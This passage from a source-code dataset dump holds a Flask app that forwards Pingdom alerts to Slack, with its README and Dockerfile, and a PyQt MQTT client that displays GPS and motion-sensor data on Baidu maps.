0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Tags:*\\n%s\"\n % \", \".join([\"`%s`\" % tag for tag in pingdom_data[\"tags\"]]),\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"check_params\", {}).get(\"shouldcontain\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Should Contain:*\\n`%s`\"\n % pingdom_data[\"check_params\"][\"shouldcontain\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"check_params\", {}).get(\"shouldnotcontain\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Should Not Contain:*\\n`%s`\"\n % pingdom_data[\"check_params\"][\"shouldnotcontain\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"first_probe\", {}).get(\"location\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*First Probe:*\\n%s\" % pingdom_data[\"first_probe\"][\"location\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data.get(\"second_probe\", {}).get(\"location\", \"\")) > 0:\n blocks[BLOCK_ID_WEBHOOK_DATA][\"fields\"].append(\n {\n \"text\": \"*Second Probe:*\\n%s\"\n % pingdom_data[\"second_probe\"][\"location\"],\n \"type\": \"mrkdwn\",\n }\n )\n\n if len(pingdom_data[\"custom_message\"]) > 0:\n blocks.append(\n {\n \"text\": {\n \"text\": \"*Custom Message*: %s\" % pingdom_data[\"custom_message\"],\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n\n if status == \"DOWN\":\n blocks.append({\"type\": \"divider\"})\n blocks.append(\n {\n \"text\": {\n \"text\": \"Downtime and *Root Cause Analysis* \"\n \"(<https://www.pingdom.com/tutorial/downtime-root-cause/|read more>)\",\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n\n analysis_counter = 0\n\n if analysis is None and status == \"DOWN\":\n blocks.append(\n {\n \"text\": {\n \"text\": \":warning: Could no fetch analysis :warning: \",\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n elif analysis is not None:\n for task in analysis[\"analysisresult\"][\"tasks\"]:\n\n blocks.append(\n {\n \"text\": {\n \"text\": \"%s analysis\" % EMOJI_NUMBER[analysis_counter],\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n fields = []\n raw_response = None\n\n for result in task[\"result\"]:\n\n value = result[\"value\"]\n\n if result[\"name\"] == \"timestamp\":\n value = datetime.datetime.fromtimestamp(\n int(result[\"value\"])\n ).strftime(\"%Y-%m-%d %H:%M:%S\")\n elif result[\"name\"] == \"raw_response\":\n # value = \"```%s```\" % \"\\n\".join(result[\"value\"])\n raw_response = \"\\n\".join(result[\"value\"])\n continue\n elif result[\"name\"] == \"communication_log\":\n continue\n # if len(result[\"value\"][0][\"response_content\"]) > 0:\n # value = \"```%s```\\n\\n```%s```\" % (\n # result[\"value\"][0][\"request\"],\n # result[\"value\"][0][\"response_content\"],\n # )\n # else:\n # value = \"```%s```\" % (result[\"value\"][0][\"request\"])\n\n fields.append(\n {\"text\": \"*%s:*\\n%s\" % (result[\"name\"], value), \"type\": \"mrkdwn\"}\n )\n\n blocks.append({\"fields\": fields, \"type\": \"section\"})\n if raw_response is not None:\n blocks.append(\n {\n \"text\": {\n \"text\": \"*Raw Response:*\\n```%s```\" % raw_response,\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n }\n )\n blocks.append({\"type\": \"divider\"})\n analysis_counter += 1\n\n # Let's build our payload\n payload = {\n \"channel\": channel,\n \"blocks\": blocks,\n \"attachments\": [],\n \"icon_emoji\": icon_emoji,\n \"username\": \"Pingdom\",\n }\n\n # Add specific headers\n headers = {\"Content-Type\": \"application/json\"}\n\n start_slack_notify = time.time()\n\n # Make the call\n response = requests.post(SLACK_WEBHOOK, headers=headers, data=json.dumps(payload))\n\n end_slack_notify = time.time()\n\n app.logger.debug(response.__dict__)\n if response.status_code == 200:\n return (\n jsonify(\n {\n \"analysis_time\": analysis_time - start_time,\n \"process_time\": start_slack_notify - analysis_time,\n \"notify_time\": end_slack_notify - start_slack_notify,\n \"total_time\": time.time() - start_time,\n }\n ),\n 200,\n )\n else:\n app.logger.debug(response.content)\n return (\n jsonify(\n {\n \"analysis_time\": analysis_time - start_time,\n \"process_time\": start_slack_notify - analysis_time,\n \"notify_time\": end_slack_notify - start_slack_notify,\n \"total_time\": time.time() - start_time,\n \"content\": response.content,\n }\n ),\n response.status_code,\n )\n\n\[email protected](\"/monitoring/health\", methods=[\"GET\"])\ndef health():\n status = 200\n if SLACK_WEBHOOK is None or PINGDOM_TOKEN is None:\n status = 500\n\n return (\n jsonify(\n {\n \"SLACK_WEBHOOK\": SLACK_WEBHOOK is not None,\n \"PINGDOM_TOKEN\": PINGDOM_TOKEN is not None,\n \"version\": __version__,\n }\n ),\n status,\n )\n\n\[email protected](\"/<channel>\", methods=[\"POST\"])\ndef slack_poster(channel):\n # Initialize the fields of our message\n check_name = None\n check_url = None\n status = None\n error = None\n\n app.logger.info(\"Post message to %s channel\", channel)\n\n # Define a default channell\n if not channel:\n return jsonify({\"error\": \"channel is missing\"}), 400\n\n try:\n pingdom_data = request.get_json()\n except Exception as e:\n app.logger.error(\"Impossible to extract data from this pingdom call\")\n app.logger.error(e)\n\n try:\n check_name = pingdom_data[\"check_name\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract check_name from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n try:\n if \"full_url\" in pingdom_data[\"check_params\"].keys():\n check_url = pingdom_data[\"check_params\"][\"full_url\"]\n else:\n check_url = pingdom_data[\"check_params\"][\"hostname\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract the full_url from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n try:\n status = pingdom_data[\"current_state\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract status from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n try:\n error = pingdom_data[\"long_description\"]\n except Exception as e:\n app.logger.error(\"Impossible to extract error message from this pingdom call\")\n app.logger.error(e)\n app.logger.debug(pingdom_data)\n\n app.logger.debug(\n \"Posting to %s: %s is %s\"\n % (channel, pingdom_data[\"check_name\"], pingdom_data[\"current_state\"])\n )\n return post_2_slack(\"#%s\" % channel, pingdom_data)\n\n\[email protected](\"/<channel>\", methods=[\"GET\"])\ndef slack_poster_get(channel):\n return \"pingdom2slack : pingdom alerts to slack webhkook !\"\n"
},
{
"alpha_fraction": 0.5744573473930359,
"alphanum_fraction": 0.5961635708808899,
"avg_line_length": 25.0657901763916,
"blob_id": "f4e8639f3ff4fecdaaa42885bf2a4ae74b28a68a",
"content_id": "507e3329d67629be912d342ddee4ee00f2d71a74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1981,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 76,
"path": "/README.md",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "# pingdom2slack\n\nSmall app to hook pingdom app monitoring to slack.\nThe goal is to add the error message when one of your site is down.\n\n## Usage\n\nThe environment variables used are:\n\n| Environment variable | Description | Type | Default |\n|:--------------------:|:-----------------------------------------------------------:|:--------:|:-----------:|\n| `SLACK_WEBHOOK` | Slack webhook. | Required | |\n| `PINGDOM_TOKEN` | Pingdom token for v3.1 API | Required | |\n| `TITLE_EMOJI_DOWN` | Emoji to use in the title, when the notification is by DOWN | Optional | `:warning:` |\n| `TITLE_EMOJI_UP` | Emoji to use in the title, when the notification is by UP | Optional | `:ok:` |\n\n\n### With Docker\n\n```\nsudo docker run -d -e SLACK_WEBHOOK=https://***** -e PINGDOM_TOKEN=***** -p 5000:5000 rcovarru/pingdom2slack\n```\n\n### Standalone app\n\n```\nvirtualenv -p python3.8 venv\nsource venv/bin/activate\npip install -r requirements.txt\nexport SLACK_WEBHOOK=https://*****\nexport PINGDOM_TOKEN=*****\n```\n\n#### Development server\n\n```\nexport FLASK_APP=pingdom2slack.py\nflask run --host=0.0.0.0\n```\n\n#### Production server\n\n```\ngunicorn --bind=0.0.0.0:5000 pingdom2slack:app\n```\n\n## Debug\n\nYou can run the app with a specific env variables `FLASK_DEBUG=1` to enable debug logging.\n\n\n## Compile requirements\n\n```\npip install pip-tools\npip-compile --output-file requirements.txt requirements.in\n```\n\n## Build & Run\n\n```\ndocker build -t pingdom2slack:local .\n\ndocker run -e SLACK_WEBHOOK=https://***** -e PINGDOM_TOKEN=***** -p 5000:5000 pingdom2slack:local\n```\n\n\n## Basic testing\n\n[Pingdom webhooks](https://www.pingdom.com/resources/webhooks/) are available in official documentation.\n\nAnd local testing example is:\n\n```\ncurl -v -H \"Content-Type: application/json\" -d @payload/http.json localhost:5000/test_channel\n```\n"
},
{
"alpha_fraction": 0.6262626051902771,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 17,
"blob_id": "cb01c9e5dd5ca9503c634cab415732002d6bf68c",
"content_id": "0afecff9f4bc8b722da250c6ed9dc3841b70407a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 11,
"path": "/Dockerfile",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "FROM python:3.8.0-alpine3.10\n\nWORKDIR /app\n\nCOPY requirements.txt pingdom2slack.py ./\n\nRUN pip install -r requirements.txt\n\nEXPOSE 5000\n\nCMD [\"gunicorn\", \"--bind=0.0.0.0:5000\", \"pingdom2slack:app\"]\n"
}
] | 4 |
asic1123/GPS_UpperComputer_MQTT
|
https://github.com/asic1123/GPS_UpperComputer_MQTT
|
bdc69f9e95baa3f8a68d3baf4b486fc0be23bef2
|
1032002986f21dde5e9c9e09e5bd7fbb6236e99e
|
0573702ef1730bfe11beec84ae0ab80287bc59e8
|
refs/heads/master
| 2020-08-08T09:30:10.957998 | 2019-07-31T06:45:57 | 2019-07-31T06:45:57 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5322746634483337,
"alphanum_fraction": 0.5498456358909607,
"avg_line_length": 38.834835052490234,
"blob_id": "f9485afed8fe3649ac5bd59e6596553bf01a5c23",
"content_id": "b3701628ad09fccd695dcd7097c208e56ba8978a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14174,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 333,
"path": "/Py/mqtt.py",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport Map\r\nimport paho.mqtt.client as mqtt\r\nimport requests\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom PyQt5.QtGui import QPixmap\r\nimport sys\r\nimport os\r\nimport threading\r\nfrom PIL import Image\r\nimport ctypes\r\nimport inspect\r\nimport time\r\n\r\nMQTTHOST = \"139.199.208.33\"\r\nMQTTPORT = 1883\r\nUSERNAME = \"\"\r\nPASSWORD = \"\"\r\nTOPIC = r'/CC3200@SHIP/2/SHIPDATA/SENSORDATA'\r\nCLIENTID = \"SXF_Python_GPSMap\"\r\nHEARTBEAT = 60\r\nclient = mqtt.Client(CLIENTID)\r\nlongitude_last = 0.0\r\nlatitude_last = 0.0\r\nt_cnt = 0\r\n\r\n\r\nclass GPS_Data(object):\r\n def __init__(self):\r\n self.UTC_year = 0 # 年份\r\n self.UTC_mon = 0 # 月份\r\n self.UTC_day = 0 # 日期\r\n self.UTC_hor = 0 # 小时\r\n self.UTC_min = 0 # 分钟\r\n self.UTC_sec = 0.0 # 秒钟\r\n self.status = '' # 定位状态: A, 有效定位; V, 无效定位\r\n self.latitude = 0.0 # 纬度\r\n self.lat_hemisphere = '' # 纬度半球, N: 北纬; S: 南纬\r\n self.longitude = 0.0 # 经度\r\n self.lon_hemisphere = '' # 经度半球, E: 东经; W: 西经\r\n self.speed = 0.0 # 地面速率, 单位: 1公里 / 小时\r\n self.course = 0.0 # 地面航向, 0~359.9°\r\n self.declination = 0.0 # 磁偏角, 0~180.0°\r\n self.declination_dir = '' # 磁偏角方向, E, 东; W, 西\r\n self.mode = '' # 模式指示, A自主定位;D查分;E估算; N数据无效\r\n\r\n\r\nclass MyMainWindow(Map.Ui_MainWindow):\r\n def __init__(self):\r\n self.thread_list = []\r\n self.label_debug_cnt = 0\r\n self.label_debug_string = \"\"\r\n self.gps_list_string = \"\"\r\n\r\n def setupUi(self, MainWindow):\r\n MainWindow.setFixedSize(1120, 710) # 禁止最大化和调整窗口大小\r\n super(MyMainWindow, self).setupUi(MainWindow)\r\n\r\n def Start(self):\r\n self.Clear()\r\n self.Label_Debug(\">> 启动中...\")\r\n mqtt_thread = threading.Thread(target=self.mqtt)\r\n mqtt_thread.start()\r\n self.thread_list.append(mqtt_thread)\r\n\r\n def Stop(self):\r\n try:\r\n client.loop_stop()\r\n self.stop_thread(self.thread_list.pop())\r\n self.Label_Debug(\"终止成功!\")\r\n print(\"终止成功!\")\r\n except Exception as e:\r\n self.Label_Debug(str(e))\r\n print(e)\r\n\r\n def Reset(self):\r\n self.label_status.setText(\"A有效;V无效\")\r\n self.label_mode.setText(\"A自主;D差分;E估算; N无效\")\r\n self.label_time.setText(\"年/月/日 时:分:秒\")\r\n self.label_lat.setText(\"N北纬;S南纬\")\r\n self.label_lon.setText(\"E东经;W西经\")\r\n self.label_speed.setText(\"公里/小时\")\r\n self.label_course.setText(\"0~359.9°\")\r\n self.label_declination.setText(\"0~180.0°\")\r\n self.label_declination_dir.setText(\"E东;W西\")\r\n self.label_debug.setText(\"DeBug Here\")\r\n self.label_img.setText(\"GPS Map Here\")\r\n self.lineEdit_topic_rec.setText(\"\")\r\n self.label_roll_v.setText(\"\")\r\n self.label_roll_dot.setText(\"\")\r\n self.label_pitch_v.setText(\"\")\r\n self.label_pitch_dot.setText(\"\")\r\n self.label_yaw_v.setText(\"\")\r\n self.label_yaw_dot.setText(\"\")\r\n\r\n def Clear(self):\r\n self.label_debug_cnt = 13\r\n self.Label_Debug(\"\")\r\n\r\n def Subs(self):\r\n global MQTTHOST, MQTTPORT, USERNAME, PASSWORD, TOPIC, CLIENTID, HEARTBEAT\r\n self.Clear()\r\n MQTTHOST = self.lineEdit_host.text()\r\n MQTTPORT = int(self.lineEdit_port.text() or 1883)\r\n USERNAME = self.lineEdit_username.text()\r\n PASSWORD = self.lineEdit_password.text()\r\n TOPIC = self.lineEdit_topic.text()\r\n CLIENTID = self.lineEdit_clientid.text()\r\n HEARTBEAT = int(self.lineEdit_heartbeat.text() or 60)\r\n self.pushButton_submit.setText(\"√\")\r\n QApplication.processEvents()\r\n time.sleep(1)\r\n self.pushButton_submit.setText(\"Submit\")\r\n self.Label_Debug(\"*\"*60+\">> 配置成功! <<\\r\\n\"+\"Host:%s\\r\\nPort:%s\\r\\nUsr:%s\\r\\nPwd:%s\\r\\nId:%s\\r\\nBeat:%s\\r\\nTopic:%s\\r\\n\" % (\r\n MQTTHOST, MQTTPORT, USERNAME, PASSWORD, CLIENTID, HEARTBEAT, TOPIC\r\n ) + \"*\"*60)\r\n\r\n def Label_Debug(self, string):\r\n if self.label_debug_cnt == 13:\r\n self.label_debug_string = \"\"\r\n self.label_debug.setText(self.label_debug_string)\r\n self.label_debug_cnt = 0\r\n self.label_debug_string += string + \"\\r\\n\"\r\n self.label_debug.setText(self.label_debug_string)\r\n self.label_debug_cnt += 1\r\n\r\n def on_connect(self, client, userdata, flags, rc):\r\n print(\"Connected with result code \" + str(rc))\r\n self.Label_Debug(\"Connected with result code \" + str(rc))\r\n self.Label_Debug(\"订阅主题 -> %s\" % TOPIC)\r\n client.subscribe(TOPIC)\r\n\r\n def on_message(self, client, userdata, msg):\r\n global t_cnt\r\n MQTT_Rx_Buff = str(msg.payload, encoding=\"utf-8\")\r\n self.lineEdit_topic_rec.setText(msg.topic)\r\n self.GPS_Calculate(MQTT_Rx_Buff)\r\n self.MPU6050_Calculate(MQTT_Rx_Buff)\r\n t_cnt += 1\r\n if t_cnt > 2:\r\n t_cnt = 0\r\n self.gps_map_main(GPS_Data.longitude, GPS_Data.latitude)\r\n\r\n def mqtt(self):\r\n client.on_connect = self.on_connect\r\n client.on_message = self.on_message\r\n client.username_pw_set(USERNAME, PASSWORD)\r\n client.connect(MQTTHOST, MQTTPORT, HEARTBEAT)\r\n # client.loop_forever() # 阻塞\r\n client.loop_start() # 线程\r\n\r\n def GPS_Calculate(self, GPS_Buff):\r\n if \"$GNRMC\" not in GPS_Buff:\r\n return\r\n GPS_Buff = GPS_Buff.split(',')\r\n GPS_Data.UTC_hor = int(GPS_Buff[1][0:2]) + 8\r\n GPS_Data.UTC_min = int(GPS_Buff[1][2:4])\r\n GPS_Data.UTC_sec = float(GPS_Buff[1][4:9])\r\n GPS_Data.status = GPS_Buff[2]\r\n GPS_Data.latitude = '%.6f' % (float(GPS_Buff[3][0:2]) + float(GPS_Buff[3][2:]) / 60) # 度\r\n GPS_Data.lat_hemisphere = GPS_Buff[4]\r\n GPS_Data.longitude = '%.6f' % (float(GPS_Buff[5][0:3]) + float(GPS_Buff[5][3:]) / 60) # 度\r\n GPS_Data.lon_hemisphere = GPS_Buff[6]\r\n GPS_Data.speed = GPS_Buff[7]\r\n GPS_Data.course = GPS_Buff[8]\r\n GPS_Data.UTC_year = GPS_Buff[9][4:]\r\n GPS_Data.UTC_mon = GPS_Buff[9][2:4]\r\n GPS_Data.UTC_day = GPS_Buff[9][0:2]\r\n GPS_Data.declination = GPS_Buff[10]\r\n GPS_Data.declination_dir = GPS_Buff[11]\r\n GPS_Data.mode = GPS_Buff[12][0]\r\n\r\n self.label_status.setText(GPS_Data.status)\r\n self.label_mode.setText(GPS_Data.mode)\r\n self.label_time.setText(\"%s/%s/%s %s:%s:%s\" % (GPS_Data.UTC_year,GPS_Data.UTC_mon,GPS_Data.UTC_day,GPS_Data.UTC_hor,GPS_Data.UTC_min,GPS_Data.UTC_sec))\r\n self.label_lat.setText(\"%s°%s\" % (GPS_Data.latitude, GPS_Data.lat_hemisphere))\r\n self.label_lon.setText(\"%s°%s\" % (GPS_Data.longitude, GPS_Data.lon_hemisphere))\r\n self.label_speed.setText(\"%s km/h\" % GPS_Data.speed)\r\n self.label_course.setText(\"%s°\" % GPS_Data.course)\r\n self.label_declination.setText(\"%s°\" % GPS_Data.declination)\r\n self.label_declination_dir.setText(\"%s\" % GPS_Data.declination_dir)\r\n\r\n print(\"*\" * 60)\r\n print(\"状态:%s; 模式:%s\" % (GPS_Data.status, GPS_Data.mode))\r\n print(\"时间:%s/%s/%s %s:%s:%s\" % (\r\n GPS_Data.UTC_year, GPS_Data.UTC_mon, GPS_Data.UTC_day, GPS_Data.UTC_hor, GPS_Data.UTC_min, GPS_Data.UTC_sec))\r\n print(\"纬度:%s°%s; 经度:%s°%s\" % (\r\n GPS_Data.latitude, GPS_Data.lat_hemisphere, GPS_Data.longitude, GPS_Data.lon_hemisphere))\r\n print(\"速率:%s; 航向:%s\" % (GPS_Data.speed, GPS_Data.course))\r\n\r\n self.Label_Debug(\"*\" * 60)\r\n self.Label_Debug(\"状态:%s; 模式:%s\" % (GPS_Data.status, GPS_Data.mode))\r\n self.Label_Debug(\"时间:%s/%s/%s %s:%s:%s\" % (\r\n GPS_Data.UTC_year, GPS_Data.UTC_mon, GPS_Data.UTC_day, GPS_Data.UTC_hor, GPS_Data.UTC_min, GPS_Data.UTC_sec))\r\n self.Label_Debug(\"纬度:%s°%s; 经度:%s°%s\" % (\r\n GPS_Data.latitude, GPS_Data.lat_hemisphere, GPS_Data.longitude, GPS_Data.lon_hemisphere))\r\n self.Label_Debug(\"速率:%s; 航向:%s\" % (GPS_Data.speed, GPS_Data.course))\r\n\r\n def MPU6050_Calculate(self, MPU6050_Buff):\r\n if \"$MPU6050\" not in MPU6050_Buff:\r\n return\r\n MPU6050_Buff = MPU6050_Buff.split(',')\r\n roll_v = MPU6050_Buff[1] # 滚转角(roll)x\r\n roll_dot = MPU6050_Buff[2]\r\n pitch_v = MPU6050_Buff[3] # 俯仰角(pitch)y\r\n pitch_dot = MPU6050_Buff[4]\r\n yaw_v = MPU6050_Buff[5] # 偏航角(yaw)z\r\n yaw_dot = MPU6050_Buff[6]\r\n self.label_roll_v.setText(roll_v)\r\n self.label_roll_dot.setText(roll_dot)\r\n self.label_pitch_v.setText(pitch_v)\r\n self.label_pitch_dot.setText(pitch_dot)\r\n self.label_yaw_v.setText(yaw_v)\r\n self.label_yaw_dot.setText(yaw_dot)\r\n with open(os.getcwd()+r'\\mpu6050.txt',\"a+\") as f:\r\n \tstring = \"%s,%s;%s,%s;%s,%s;\\r\\n\" % (roll_v,roll_dot,pitch_v,pitch_dot,yaw_v,yaw_dot)\r\n \tf.write(string)\r\n \tf.close()\r\n\r\n def gps2baidu(self, longitude, latitude):\r\n try:\r\n url_base = r'http://api.map.baidu.com/geoconv/v1/?from=1'\r\n ak = ''\r\n coords = str(longitude) + ',' + str(latitude)\r\n url = \"%s&ak=%s&coords=%s\" % (url_base, ak, coords)\r\n html_json = requests.get(url).json()\r\n longitude_baidu = html_json['result'][0]['x'] # 经度\r\n latitude_baidu = html_json['result'][0]['y'] # 纬度\r\n except Exception as e:\r\n print(e)\r\n url = \"http://map.yanue.net/gpsapi.php?lat=%s&lng=%s&\" % (latitude, longitude)\r\n html_json = requests.get(url).json()\r\n longitude_baidu = html_json['baidu']['lng'] # 经度\r\n latitude_baidu = html_json['baidu']['lat'] # 纬度\r\n return longitude_baidu, latitude_baidu\r\n\r\n def map_show(self, longitude, latitude):\r\n url_base = r'http://api.map.baidu.com/staticimage/v2?'\r\n center = str(longitude) + ',' + str(latitude)\r\n markers = str(longitude) + ',' + str(latitude)\r\n ak = ''\r\n height = 600\r\n width = 600\r\n url = \"%s&zoom=19&ak=%s¢er=%s&markers=%s&height=%s&width=%s\" % (\r\n url_base, ak, center, markers, height, width)\r\n html = requests.get(url)\r\n self.Label_Debug(\">> 获取静态地图 <<\")\r\n print(\">> 获取静态地图 <<\")\r\n with open(\"map.jpg\", 'wb') as f:\r\n f.write(html.content)\r\n f.close()\r\n\r\n def gps_map_main(self, longitude, latitude):\r\n global longitude_last\r\n global latitude_last\r\n if GPS_Data.status != 'A' or GPS_Data.mode != 'A':\r\n self.Label_Debug(\">> 无效定位 <<\")\r\n print(\">> 无效定位 <<\")\r\n return\r\n if longitude_last == longitude or latitude_last == latitude:\r\n self.Label_Debug(\">> 坐标未更新 <<\")\r\n print(\">> 坐标未更新 <<\")\r\n self.label_gpsupdate.setStyleSheet(\"color: rgb(0, 255, 0);;\")\r\n self.label_gpsupdate.setText(\"坐标未更新\")\r\n return\r\n self.Label_Debug(\">> 有效定位 <<\")\r\n print(\">> 有效定位 <<\")\r\n longitude_last = longitude\r\n latitude_last = latitude\r\n lon_baidu, lat_baidu = self.gps2baidu(longitude, latitude)\r\n self.Label_Debug(\">> 坐标已更新 <<\")\r\n print(\">> 坐标已更新 <<\")\r\n self.label_gpsupdate.setStyleSheet(\"color: rgb(255, 0, 0);\")\r\n self.label_gpsupdate.setText(\"坐标已更新\")\r\n\r\n self.gps_list_string += (\"%s,%s;\" % (longitude, latitude))\r\n self.map_show(lon_baidu, lat_baidu)\r\n self.Update_GPSImage()\r\n\r\n with open(os.getcwd()+r'\\gps.txt',\"a+\") as f:\r\n \tprint(os.getcwd()+\"gps.txt\")\r\n \tstring = \"UTC:%s/%s/%s %s:%s:%s; 纬度:%s°%s; 经度:%s°%s; 速率:%s; 航向:%s\\r\\n\" % (GPS_Data.UTC_year, GPS_Data.UTC_mon, GPS_Data.UTC_day, GPS_Data.UTC_hor, GPS_Data.UTC_min, GPS_Data.UTC_sec,GPS_Data.latitude, GPS_Data.lat_hemisphere, GPS_Data.longitude, GPS_Data.lon_hemisphere,GPS_Data.speed, GPS_Data.course)\r\n \tf.write(string)\r\n \tf.close()\r\n\r\n\r\n def Update_GPSImage(self):\r\n image = Image.open('map.jpg')\r\n image.save('map.png')\r\n print(\"OK - 0\")\r\n pix = QPixmap('map.png')\r\n print(\"OK - 1\")\r\n self.label_img.setPixmap(pix)\r\n print(\"OK - 2\")\r\n QApplication.processEvents()\r\n os.remove('map.jpg')\r\n os.remove('map.png')\r\n print(\"OK - 3\")\r\n\r\n\r\n################################强制关闭线程##################################################\r\n def _async_raise(self, tid, exctype):\r\n \"\"\"raises the exception, performs cleanup if needed\"\"\"\r\n tid = ctypes.c_long(tid)\r\n if not inspect.isclass(exctype):\r\n exctype = type(exctype)\r\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\r\n if res == 0:\r\n raise ValueError(\"invalid thread id\")\r\n elif res != 1:\r\n # \"\"\"if it returns a number greater than one, you're in trouble,\r\n # and you should call it again with exc=NULL to revert the effect\"\"\"\r\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\r\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\r\n\r\n def stop_thread(self, thread):\r\n self._async_raise(thread.ident, SystemExit)\r\n###############################################################################################\r\n\r\n\r\ndef ui_main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = MyMainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n\r\n\r\nif __name__ == '__main__':\r\n ui_main()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5059602856636047,
"alphanum_fraction": 0.5317880511283875,
"avg_line_length": 33.75609588623047,
"blob_id": "7aad2447a93cb12e9a1b6042b3846a0ef7846427",
"content_id": "098514cb44b1aa71788ee88c7e6d7cedac8ba987",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1510,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 41,
"path": "/Py/process.py",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport csv\r\n\r\n# with open(os.getcwd()+r'\\gps.txt', 'r') as f:\r\n# \twith open(os.getcwd()+r'\\gps.csv', 'w', newline='') as f_csv:\r\n# \t\tcontents = f.readlines()\r\n# \t\tfor i in contents:\r\n# \t\t\tlists = i.split(';')\r\n# \t\t\tUTC = \"%s:%s:%s\" % (int(lists[0].split(':')[1].split(' ')[1])-4,lists[0].split(':')[2],lists[0].split(':')[3])\r\n# \t\t\tweidu = lists[1].split(':')[1].strip('N')\r\n# \t\t\tjingdu = lists[2].split(':')[1].strip('E')\r\n# \t\t\tspeed = lists[3].split(':')[1]\r\n# \t\t\thangxiang = lists[4].split(':')[1]\r\n# \t\t\t# print(UTC,weidu,jingdu,speed,hangxiang)\r\n# \t\t\tcsv_writer = csv.writer(f_csv)\r\n# \t\t\tcsv_row = [str(UTC),str(weidu),str(jingdu),str(speed),str(hangxiang)]\r\n# \t\t\tcsv_writer.writerow(csv_row)\r\n# \t\tf_csv.close()\r\n# \tf.close()\r\n\r\n\r\n\r\nwith open(os.getcwd()+r'\\mpu6050.txt', 'r') as f:\r\n\twith open(os.getcwd()+r'\\mpu6050.csv', 'w', newline='') as f_csv:\r\n\t\tcontents = f.readlines()\r\n\t\tfor i in contents:\r\n\t\t\tlists = i.split(';')\r\n\t\t\t# print(lists[0].split(',')[1])\r\n\t\t\troll_v = lists[0].split(',')[0].strip()\r\n\t\t\troll_dot = lists[0].split(',')[1].strip()\r\n\t\t\tpitch_v = lists[1].split(',')[0].strip()\r\n\t\t\tpitch_dot = lists[1].split(',')[1].strip()\r\n\t\t\tyaw_v = lists[2].split(',')[0].strip()\r\n\t\t\tyaw_dot = lists[2].split(',')[1].strip()\r\n\t\t\tcsv_writer = csv.writer(f_csv)\r\n\t\t\tcsv_row = [str(roll_v),str(roll_dot),str(pitch_v),str(pitch_dot),str(yaw_v),str(yaw_dot)]\r\n\t\t\tcsv_writer.writerow(csv_row)\r\n\t\tf_csv.close()\r\n\tf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.648666501045227,
"alphanum_fraction": 0.6786035299301147,
"avg_line_length": 53.3628044128418,
"blob_id": "1c7db49939083c511b99239be5157668cc18fa93",
"content_id": "1cfdb7b1bbdce2a144b225abd4097bc374d12ae1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 54931,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 984,
"path": "/Py/Map.py",
"repo_name": "asic1123/GPS_UpperComputer_MQTT",
"src_encoding": "UTF-8",
